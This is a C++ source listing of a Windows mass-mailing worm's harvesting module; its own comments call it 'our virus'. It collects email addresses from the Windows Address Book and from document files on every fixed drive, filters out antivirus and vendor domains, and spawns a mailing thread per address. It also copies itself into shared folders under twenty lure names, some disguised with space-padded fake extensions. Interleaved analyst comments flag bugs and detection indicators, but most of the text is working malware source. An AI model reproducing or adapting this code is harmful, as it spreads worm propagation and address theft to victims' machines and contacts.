FlyFar

Harvester.cpp

Mar 26th, 2024
  1. #include <stdio.h>  
  2. #include <windows.h>
  3. #include "mailer.h"
  4.  
  5.  
  // massmail_it: filter one harvested address and, if it passes, start a
  // thread running mail_it on it. mail_it is not defined in this listing
  // (presumably declared in "mailer.h" -- confirm against that header).
  //
  // Visible behaviour:
  //   - Returns without doing anything when the address contains any
  //     substring from list[] (anti-virus vendors, Microsoft, MSN, Hotmail,
  //     "@noreply", ...) or contains no '.' at all.
  //   - Otherwise creates one thread per address. The handle returned by
  //     CreateThread is discarded, and the thread is given the caller's
  //     pointer rather than a copy of the string.
  //
  // For defenders: the deny-list entries are plain string literals in this
  // source, so they may serve as static signature material if they survive
  // unobfuscated in a build (verify on the sample). One thread per address
  // found on disk is also a noticeable pattern during triage.
  6. void massmail_it(char *address)
  7. {
  8.  
       // Substring deny-list. The loop below stops at the NULL entry, so the
       // "\n\n\n" element that follows it is never compared.
  9.     static const char *list[] = {
  10.          "@symantec", "@panda", "@avp", "@microsoft",  
  11.          "@msn", "@sopho", "@mm", "@norman", "@norton", "@noreply", "@virusli", "@fsecure",
  12.         "@hotmail", NULL, "\n\n\n" };
  13.    
  14.  
  15.     register int m;
  16.  
       // Plain substring match: any address containing a listed fragment is dropped.
  17.     for (m=0; list[m]; m++)
  18.         if (strstr(address, list[m])) return; //mail filter
       // Minimal plausibility check: an address without any '.' is dropped.
  19.       if(!strstr(address,".")) return;
  20.  
  21.  
  22.     DWORD tid;
  23.  
       // Default security attributes and stack size, no creation flags; the
       // thread id is written to tid and the returned handle is not kept.
  24. CreateThread(0, 0, mail_it, (char *)address, 0, &tid);
  25. return;
  26.  
  27.    
  28.  
  29. }
  30.  
  31. // Opens the file and scans to the end of it looking for an '@' sign.
  32. // If one is found, it backs up to the beginning of the address,
  33. // reads the address from beginning to end (harvests it), and then
  34. // passes it to massmail_it.
  //
  // Analyst notes, taken from the code below:
  //   - The file is opened twice in "rb" mode: the first pass counts bytes
  //     and '@' characters, the second pass extracts the addresses.
  //   - Characters accepted as part of an address: a-z, A-Z, 0-9, '_', '-',
  //     '.', and (in the forward scan only) '@'.
  //   - collected[] holds 200 bytes and idx is never compared with that size,
  //     so a run of 200 or more accepted characters in a scanned file is
  //     written past the end of the array.
  //   - Returns 0 on every path, including when fopen fails.
  35. int harvest_textfile(const char *text_file)
  36. {
  37.    
  38. FILE *fp;  
  39. long byte_count = 0L;
  40. long at_count = 0L;
  41. char collected[200];
  42.  
  43.   int ch;
  44.   long fpos = 0L;
  45.   int idx;
  46.  
  47.   if ( (fp = fopen(text_file, "rb")) == NULL) {
  48.    
  49.     return 0;
  50.   }
  51.  
       // Pass 1: count the bytes (used as a bound in pass 2) and the '@' signs.
       // at_count is incremented in both passes but never read.
  52.   while ((ch = fgetc(fp)) != EOF) {
  53.     if (ch == '@') at_count++;  
  54.     byte_count++;
  55.   }
  56.   fclose(fp);
  57.  
  58.  
  59.   if ( (fp = fopen(text_file, "rb")) == NULL) {
  60.     return 0;
  61.   }
  62.  
  63.  
       // Pass 2: for every '@', walk backwards to the start of the address,
       // then read forwards to collect it.
  64.   int valid = 0;
  65.   while ((ch = fgetc(fp)) != EOF && (fpos <= byte_count)) {
  66.     if (ch == '@') {
  67.       at_count++;    
  68.    
           // ftell is one past the '@' that was just read, so this is its offset.
  69.       fpos = ftell(fp) - 1L;
  70.  
           // Step to the byte before the '@' (when there is one) and re-read it.
           // The origin argument 0 is SEEK_SET in common C libraries.
  71.       if (fpos >= 1L) fpos--;
  72.       fseek(fp, fpos, 0);  
  73.       ch = fgetc(fp);
  74.  
           // Move back one byte at a time while the byte is an address character.
  75.       while (  (ch >= 'a' && ch <= 'z') ||
  76.                (ch >= 'A' && ch <= 'Z') ||
  77.                (ch >= '0' && ch <= '9') ||
  78.                (ch == '_' || ch == '-'  || ch == '.') ) {
  79.              
               // Reached the start of the file: the address begins at offset 0.
  80.         if (fpos == 0) {
  81.           rewind(fp);
  82.           break;
  83.         }
  84.         else {
  85.           fpos--;  
  86.           fseek(fp, fpos, 0);  
  87.           ch = fgetc(fp);
  88.         }      
               // NOTE(review): fp is closed here, yet the fgetc and fclose calls
               // further down still use it.
  89.         if (ch == EOF) fclose(fp);
  90.       }            
  91.  
  92.  
  93.       idx = 0;
  94.  
           // Forward scan: the stream is now positioned just after the first
           // non-address byte, i.e. at the first character of the address.
  95.       while ( (ch = fgetc(fp)) != EOF) {  
  96.         valid = 0;
  97.         if (ch >= 'a' && ch <= 'z') valid = 1;
  98.         if (ch >= 'A' && ch <= 'Z') valid = 1;
  99.         if (ch >= '0' && ch <= '9') valid = 1;
  100.         if (ch == '_' || ch == '-') valid = 1;
  101.         if (ch == '@' || ch == '.') valid = 1;
  102.        
  103.        
  104.         if (!valid) break;
  105.      
               // No bound check on idx against sizeof(collected).
  106.         collected[idx] = ch;      
  107.         idx++;
  108.        
  109.       }        
  110.       collected[idx] = '\0';
  111.  
  112.      
           // The same stack buffer is handed over for every address in the file.
  113.       massmail_it(collected);
  114.     }      
  115.   }
  116.   fclose(fp);
  117.   return 0;
  118. }
  119.  
  120. //Harvests email addresses out of windows address book
  121.  
  122. /**********************************************
  123. *
  124. *
  125. * Synopsis on Wab address collection:
  126. * Our virus first finds the location of WAB from the registry.
  127. * Create the file mapping. Begin finding email IDs
  128. * File format of WAB is easy to understand
  129. * The number of addresses is stored at offset 0x64 of the mapped file, and the starting offset
  130. * of the email addresses is stored at offset 0x60.
  131. * Once our virus finds the email addresses the virus Unmaps the mapped WAB file
  132. * by calling UnmapViewOfFile API, then close all opened handles.
  133. *
  134. *
  135. *
  136. **********************************************/
  // harvest_wab: read the Windows Address Book (WAB) file path from the
  // registry, map that file read-only, and pass each address record found in
  // it to massmail_it. Returns 0 on every path.
  //
  // Behaviour useful for detection and triage:
  //   - Opens the key Software\Microsoft\WAB\WAB4\Wab File Name under
  //     HKEY_CURRENT_USER with KEY_ALL_ACCESS and reads its default value.
  //   - Opens the resulting path with OPEN_ALWAYS, which creates the file
  //     when it does not exist yet, then maps the whole file for reading.
  //
  // Robustness observations:
  //   - The results of RegOpenKeyEx, RegQueryValueEx and CreateFile are not
  //     checked; only the mapping and view handles are.
  //   - sz is set to 800 while pathw is MAX_PATH bytes, so the size reported
  //     to RegQueryValueEx is larger than the buffer.
  //   - The count and offset read from the file are used without comparing
  //     them with the size of the mapping.
  137. int harvest_wab()
  138. {
  139.     HANDLE fhandle1;
  140.     BYTE pathw[MAX_PATH];
  141.     DWORD sz;
  142.     HKEY hkeyresult;
  143.     sz=800;
  144.     RegOpenKeyEx(HKEY_CURRENT_USER, (LPCTSTR)"Software\\Microsoft\\WAB\\WAB4\\Wab File Name" , 0,KEY_ALL_ACCESS, &hkeyresult );
         // Empty value name: reads the key's default value into pathw.
  145.     RegQueryValueEx (hkeyresult, (LPCTSTR)"",0,0, pathw, &sz ) ;
  146.     RegCloseKey(hkeyresult);
  147.  
  148.     fhandle1 = CreateFile ((char *)pathw,GENERIC_READ,FILE_SHARE_READ,
  149.                           NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
  150.     char *buffer=NULL;
  151.     HANDLE fhandle2=CreateFileMapping(fhandle1,0,PAGE_READONLY,0,0,0);
  152.     if(!fhandle2) {
  153.         CloseHandle(fhandle1);
  154.         return 0;
  155.     }
  156.     buffer=(char *)MapViewOfFile(fhandle2,FILE_MAP_READ,0,0,0);
  157.     if(!buffer) {
  158.         CloseHandle(fhandle2);
  159.         CloseHandle(fhandle1);
  160.         return 0;
  161.     }
  162.  
         // Record count: a single byte at offset 0x64, converted to int.
  163.     int bld;
  164.     bld=int(*(buffer+0x64));
         // Start offset of the records: the four bytes at 0x60..0x63 combined
         // low byte first.
  165.     DWORD add=MAKELONG(MAKEWORD(*(buffer+0x60),*(buffer+0x61)),
  166.                                 MAKEWORD(*(buffer+0x62),*(buffer+0x63)));
  167.     char addressOne[300];
  168.     int ii,j=0;
  169.     int len;
         // Records are taken at a stride of 68 bytes. For each one, 69 bytes are
         // copied, reading every second source byte (j += 2) -- presumably to
         // narrow 16-bit characters to 8-bit ones; confirm against the WAB format.
  170.     for (len=0;len<(bld*68);len+=68){
  171.         for (ii=0;ii<=68;ii++)
  172.         {
  173.             addressOne[ii]=*(buffer+add+j+len);
  174.             j+=2;
  175.         }
             // Force termination at index 68 and reset the source stride counter.
  176.         addressOne[68]='\0';j=0;
  177.  
  178. massmail_it(addressOne);
  179.        
  180.     }
  181.     CloseHandle (fhandle1);    
  182.     UnmapViewOfFile(buffer);
  183.     CloseHandle (fhandle2);    
  184.  
  185.     return 0;
  186. }
  187.  
  // File-scope buffer. copy_to declares a local array with the same name,
  // which shadows this one; no other use is visible in this listing.
  188. char pathname[256];
  189.  
  // copy_to: copy the running executable into the directory p2p under twenty
  // lure file names.
  //
  // p2p is the directory path. It is modified in place: the first lure name
  // is appended to the caller's buffer with no length check.
  //
  // Behaviour useful for detection and triage:
  //   - The copy source is the process's own image path, obtained with
  //     GetModuleHandle(NULL) and GetModuleFileName.
  //   - CopyFile is called with bFailIfExists = 0, so an existing file with
  //     the same name is overwritten. No return value is checked.
  //   - Several names carry a document, archive or media extension followed
  //     by a long run of spaces and then ".exe", presumably so that a narrow
  //     file listing shows only the first extension; one name ends in ".scr".
  //   - Hunting ideas: executables whose name contains padding spaces before
  //     the final extension, and many same-content executables appearing in
  //     one directory within a short time.
  //
  // Robustness observation: p2p2..p2p20 are uninitialised when strcat appends
  // to them, so the destination paths of those nineteen copies depend on what
  // the stack held. File-name indicators from this routine should therefore be
  // confirmed on a real sample rather than assumed from the source.
  190. void copy_to(char *p2p)
  191. {
  192.  
       // Local array; it shadows the file-scope pathname.
  193. char pathname[256];
  194. char p2p2[MAX_PATH];
  195. char p2p3[MAX_PATH];
  196. char p2p4[MAX_PATH];
  197. char p2p5[MAX_PATH];
  198. char p2p6[MAX_PATH];
  199. char p2p7[MAX_PATH];
  200. char p2p8[MAX_PATH];
  201. char p2p9[MAX_PATH];
  202. char p2p10[MAX_PATH];
  203. char p2p11[MAX_PATH];
  204. char p2p12[MAX_PATH];
  205. char p2p13[MAX_PATH];
  206. char p2p14[MAX_PATH];
  207. char p2p15[MAX_PATH];
  208. char p2p16[MAX_PATH];
  209. char p2p17[MAX_PATH];
  210. char p2p18[MAX_PATH];
  211. char p2p19[MAX_PATH];
  212. char p2p20[MAX_PATH];
  213.  
  214.  
  215.  
       // Path of the running executable; nRet is not used afterwards.
  216. HMODULE hMe = GetModuleHandle(NULL);
  217. DWORD nRet = GetModuleFileName(hMe, pathname, 256);
       // Appends the directory to each (uninitialised) destination buffer.
  218. strcat(p2p2, p2p);
  219. strcat(p2p3, p2p);
  220. strcat(p2p4, p2p);
  221. strcat(p2p5, p2p);
  222. strcat(p2p6, p2p);
  223. strcat(p2p7, p2p);
  224. strcat(p2p8, p2p);
  225. strcat(p2p9, p2p);
  226. strcat(p2p10, p2p);
  227. strcat(p2p11, p2p);
  228. strcat(p2p12, p2p);
  229. strcat(p2p13, p2p);
  230. strcat(p2p14, p2p);
  231. strcat(p2p15, p2p);
  232. strcat(p2p16, p2p);
  233. strcat(p2p17, p2p);
  234. strcat(p2p18, p2p);
  235. strcat(p2p19, p2p);
  236. strcat(p2p20, p2p);
  237.  
  238.  
       // Lure names. The first one is appended to the caller's own buffer.
  239. strcat(p2p, "\\ACDSEE10.exe");
  240. strcat(p2p2, "\\Adobe Photoshop Full Version.exe");
  241. strcat(p2p3, "\\Cisco source code.zip                       .exe");
  242. strcat(p2p4, "\\WinAmp 6.exe");
  243. strcat(p2p5, "\\WinRAR.exe");
  244. strcat(p2p6, "\\Windows Longhorn Beta.exe");
  245. strcat(p2p7, "\\WINDOWS SOURCE CODE.zip                            .exe");
  246. strcat(p2p8, "\\jenna jameson screensaver.scr");
  247. strcat(p2p9, "\\Opera Registered version.exe");
  248. strcat(p2p10, "\\Snood new version.exe");
  249. strcat(p2p11, "\\Brianna banks and jenna jameson.mpeg                        .exe");
  250. strcat(p2p12, "\\Norton AntiVirus 2004.exe");
  251. strcat(p2p13, "\\Battlefield 1942.exe");
  252. strcat(p2p14, "\\NETSKY SOURCE CODE.zip                                   .exe");
  253. strcat(p2p15, "\\Kazaa Lite.zip                                  .exe");
  254. strcat(p2p16, "\\Windows crack.zip                                              .exe");
  255. strcat(p2p17, "\\Teen Porn.mpeg                                             .exe");
  256. strcat(p2p18, "\\Britney spears naked.jpeg                                           .exe");
  257. strcat(p2p19, "\\DVD Xcopy xpress.exe");
  258. strcat(p2p20, "\\Visual Studio.NET.zip                                                   .exe");
  259.  
  260.  
  261.  
       // Third argument 0 = do not fail if the destination already exists.
  262. CopyFile(pathname,p2p,0);
  263. CopyFile(pathname,p2p2,0);
  264. CopyFile(pathname,p2p3,0);
  265. CopyFile(pathname,p2p4,0);
  266. CopyFile(pathname,p2p5,0);
  267. CopyFile(pathname,p2p6,0);
  268. CopyFile(pathname,p2p7,0);
  269. CopyFile(pathname,p2p8,0);
  270. CopyFile(pathname,p2p9,0);
  271. CopyFile(pathname,p2p10,0);
  272. CopyFile(pathname,p2p11,0);
  273. CopyFile(pathname,p2p12,0);
  274. CopyFile(pathname,p2p13,0);
  275. CopyFile(pathname,p2p14,0);
  276. CopyFile(pathname,p2p15,0);
  277. CopyFile(pathname,p2p16,0);
  278. CopyFile(pathname,p2p17,0);
  279. CopyFile(pathname,p2p18,0);
  280. CopyFile(pathname,p2p19,0);
  281. CopyFile(pathname,p2p20,0);
  282.  
  283.  
  284.  
  285. }
  286. //copy to folders containing "shar"
  // p2p_in: lowercase path in place and, when it contains the substring
  // "shar", call copy_to on it; otherwise do nothing.
  //
  // The substring presumably targets the shared folders of file-sharing
  // clients (inferred from the lure names used by copy_to, not stated in the
  // code). It matches anywhere in the full path, so any directory whose path
  // contains "shar" is affected, not only one whose own name does.
  287. void p2p_in(char *path)
  288. {
       // CharLower modifies the caller's buffer.
  289. CharLower(path);
  290.     if (strstr(path,"shar")) {
  291.         copy_to(path);
  292.     }
  293.     else {
  294.         return;
  295. }
  296.  
  297. }
  298.  
  // harvest_extensions: decide from the file name's extension whether the file
  // at destination is scanned for addresses.
  //
  // destination is the full path handed to harvest_textfile; finder supplies
  // the file name (cFileName) from which the extension is taken.
  //
  // Extensions that trigger a scan (compared after lowercasing): html, htm,
  // txt, xml, doc, rtf, jsp, asp, adb, dbx. "jsp" is listed twice.
  // For defenders: one process opening every file with these extensions across
  // whole drives is a distinctive file-access pattern.
  299. void harvest_extensions(const char *destination, WIN32_FIND_DATA *finder)
  300. {
  301.     char Extension[MAX_PATH];
  302.     int e, o;
  303.  
         // o ends up as the index of the last '.' in the name, or -1 if none.
  304.     for (e=0,o=-1; finder->cFileName[e] && (e < 255); e++)
  305.         if (finder->cFileName[e] == '.') o=e;
  306.  
  307.     if (o < 0) {
  308.         Extension[0] = 0;
  309.     } else {
  310.         lstrcpyn(Extension, finder->cFileName+o+1, sizeof(Extension)-1);
  311.         CharLower(Extension);
  312.     }
  313.  
         // do { ... } while (0) is used as a block that "break" can leave early.
         // e == 1 at the break means "extension matched".
  314.     do {
  315.        
  316. e = 1;             
  317.  
  318.  
  319. if (lstrcmp(Extension, "html") == 0) break;
  320. if (lstrcmp(Extension, "htm") == 0) break;
  321. if (lstrcmp(Extension, "txt") == 0) break;
  322. if (lstrcmp(Extension, "xml") == 0) break;
  323. if (lstrcmp(Extension, "doc") == 0) break;
  324. if (lstrcmp(Extension, "rtf") == 0) break;
  325. if (lstrcmp(Extension, "jsp") == 0) break;
  326. if (lstrcmp(Extension, "asp") == 0) break;
  327. if (lstrcmp(Extension, "jsp") == 0) break;
  328. if (lstrcmp(Extension, "adb") == 0) break;
  329. if (lstrcmp(Extension, "dbx") == 0) break;
  330.        
  331.  
  332. e = 0;             
  333.        
  334.  
         // Without braces this "if" guards only the assignment that follows it.
  335. if (Extension[0] == 0)
  336.            
  337.  
  338.    
  339. e = 0;
             // Not guarded by the "if" above: every file whose extension did
             // not match returns here.
  340.         return;
  341.     }
  342.    
  343.     while (0);
  344.    
         // Reached only through one of the "break" statements above.
  345.     if (e == 1) {
  346.         harvest_textfile(destination);
  347.     }
  348.    
  349. }
  350.  
  351.  
  352.  
  // recursive: walk the directory tree under path, at most max_level levels
  // deep. Files go to harvest_extensions; directories are descended into
  // first and then passed to p2p_in.
  //
  // Returns 1 when max_level <= 0 or path is NULL or empty, otherwise 0.
  //
  // Observations:
  //   - buffer is 280 bytes; path and data.cFileName are copied into it with
  //     strcpy, lstrcpy and strcat, none of which check the length.
  //   - The value 0 in finder means "search not started yet";
  //     INVALID_HANDLE_VALUE is converted to 0 so both cases end the loop.
  //   - The recursive call's return value is ignored.
  353. int recursive(const char *path, int max_level)
  354. {
  355.     char buffer[280];
  356.     WIN32_FIND_DATA data;
  357.     HANDLE finder;
  358.    
  359.  
  360.     if ((max_level <= 0) || (path == NULL)) return 1;
  361.     if (path[0] == 0) return 1;
  362.  
         // Build the search pattern: path, a backslash if missing, then "*.*".
  363.     strcpy(buffer, path);
  364.     if (buffer[strlen(buffer)-1] != '\\') strcat(buffer, "\\");
  365.     strcat(buffer, "*.*");
  366.  
  367.     memset(&data, 0, sizeof(data));
  368.  
  369.     for (finder=0;;)
  370.     {
             // First iteration starts the search, later ones fetch the next entry.
  371.         if (finder == 0)
  372.        
  373.         {
  374.             finder = FindFirstFile(buffer, &data);
  375.             if (finder == INVALID_HANDLE_VALUE) finder = 0;
  376.             if (finder == 0)
  377.                 break;
  378.         }
  379.         else
  380.         {
  381.             if (FindNextFile(finder, &data) == 0) break;
  382.         }
  383.  
             // Skip the "." and ".." entries.
  384.         if (data.cFileName[0] == '.')
  385.  
  386.         {
  387.             if (data.cFileName[1] == 0)
  388.                 continue;
  389.             if (data.cFileName[1] == '.')
  390.  
  391.                 if (data.cFileName[2] == 0)
  392.                    
  393.                     continue;
  394.         }
  395.  
             // Rebuild buffer as the full path of the current entry.
  396.         lstrcpy(buffer, path);
  397.         if (buffer[strlen(buffer)-1] != '\\') strcat(buffer, "\\");
  398.         strcat(buffer, data.cFileName);
  399.  
  400.         if ((data.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) == FILE_ATTRIBUTE_DIRECTORY) {
                 // Descend first, then hand the directory path to p2p_in, which
                 // lowercases buffer in place.
  401.             recursive(buffer, max_level-1 );
  402.             p2p_in(buffer); //copy to folders containing "shar"
  403.  
  404.         }
  405.        
  406.         else
  407.             harvest_extensions(buffer,&data);
  408.        
  409.     }
  410.  
  411.     if (finder != 0) FindClose(finder);
  412.  
  413.     return 0;
  414. }
  415.  
  416.  
  417.  
  // harvest_disks: walk the drive letters C: through X: and run recursive()
  // with a depth limit of 15 on every drive that GetDriveType reports as
  // DRIVE_FIXED or DRIVE_RAMDISK. Other drive types are skipped.
  //
  // Observations:
  //   - sysdisk is read from buffer[0] immediately after the memset, so it is
  //     always 0 and the "skip this drive" comparison in the loop never
  //     matches; no drive letter is excluded by it.
  //   - Sleep(3000) pauses for three seconds before each qualifying drive is
  //     scanned.
  // For defenders: a full recursive walk of every fixed drive by one process
  // shows up clearly in file-system telemetry.
  418. void harvest_disks()
  419. {
  420.     char buffer[MAX_PATH], sysdisk;
  421.  
  422.     memset(buffer, 0, sizeof(buffer));
  423.  
  424.     sysdisk = buffer[0];
  425.  
         // buffer becomes "<letter>:" followed by a backslash; the letter is
         // filled in by the loop below.
  426.     strcpy(buffer+1, ":\\");
  427.  
  428.     for (buffer [0] = 'C' ; buffer [0] <'Y'; buffer[0]++)
  429.    
  430.     {
  431.         if (buffer[0] == sysdisk) continue;
  432.         switch (GetDriveType(buffer)) {
  433.             case DRIVE_FIXED:
  434.             case DRIVE_RAMDISK:
  435.                 break;
  436.  
  437.             default:
  438.  
  439.                 continue;
  440.         }
  441.         Sleep(3000);
  442.         recursive(buffer, 15);
  443.     }
  444. }
  445.  
  446.  
  // harvest_main: entry point of the harvesting stage. Runs the address-book
  // harvest first, then the scan of the drives; the integer result of
  // harvest_wab is ignored.
  447. void harvest_main()
  448. {
  449.    
  450.         harvest_wab();
  451.         harvest_disks();
  452.    
  453. }
  454.  